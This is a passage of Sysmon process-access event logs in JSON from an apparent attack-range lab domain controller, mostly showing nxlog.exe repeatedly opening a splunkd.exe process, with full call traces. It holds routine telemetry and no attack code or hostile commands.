06:59:16.413","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-00103CD40900}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.429\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-00103CD40900}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.429","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-00103CD40900}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:17.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:17.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:18.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:18.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:19.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:19.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:20.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:20.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:21.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 